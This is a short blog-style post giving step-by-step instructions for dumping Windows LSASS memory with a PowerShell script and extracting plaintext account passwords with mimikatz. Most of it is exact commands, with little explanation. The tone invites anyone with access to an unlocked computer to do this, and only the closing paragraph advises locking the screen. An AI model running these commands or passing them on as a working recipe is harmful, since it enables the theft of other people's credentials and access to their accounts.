Did you know that your Windows passwords are vulnerable and hackable in less than 5 minutes?
Yep, even in Windows 10, the method is still working nicely. The method is not new at all. So, let me show how you can reproduce it by using a simple exploitation tool and a PowerShell script. Anyone can perform this hacking when you left your computer unlocked. I’m not really going to explain the details, just go straight to the steps. Google is on your fingertips if you are keen to explore more.
Getting started
First, you need to download or get this tool called mimikatz (just get the binary package, e.g. mimikatz_trunk.zip) and this PowerShell script Out-Minidump.ps1 by Matthew Graeber. Let’s start!
Using PowerShell to perform memory dump
To perform the LSASS dump, we will use the PowerShell script, Out-Minidump.ps1. The flow of cmdlet will look like this:
. 'G:\USERFILES\Desktop\PowerShell Playground\Out-Minidump.ps1'
# "dot sourcing" method to import function from the script
Get-Process lsass | Out-Minidump
# To perform the LSASS dump
Copy-Item .\lsass_868.dmp 'G:\USERFILES\Desktop\PowerShell Playground'
# Copy the dump file to desired location
Using mimikatz terminal program to view the passwords
As you can see, lsass_868.dmp is the example of LSASS dump file captured using the PowerShell script. Now, it’s time we use the mimikatz terminal to load in the dump file as follows:
sekurlsa::minidump "G:\USERFILES\Desktop\PowerShell Playground\lsass_868.dmp"
Switching to MINIDUMP file, so now we can view the passwords. Now, run this command to display all the accounts and passwords available:
sekurlsa::logonPasswords full
Tadaa… Now I can see my actual Microsoft Account username and password in a plain text. As you imagine, most of people nowadays are still using the same password for almost everything. So, I expected you can picture all the consequences with this vulnerability…
The existing vulnerability
The fact is that the password is encrypted but it’s useless as the implementation depends on two basic Win32 functions; LsaProtectMemory (the encryption function) and LsaUnprotectMemory (the decryption function). And Windows stores encrypted user passwords in memory without using one-way hash which is decryptable using LsaUnprotectMemory function to a plain text.
The bottom line
You will be safe as long as you always lock your computer when you’re away. For more explanations and security advices, you might want to check the original article here. This short article is just to remind me or anyone else to always be careful in whatever we do especially with anything to do with passwords and personal credential information. No system is perfect!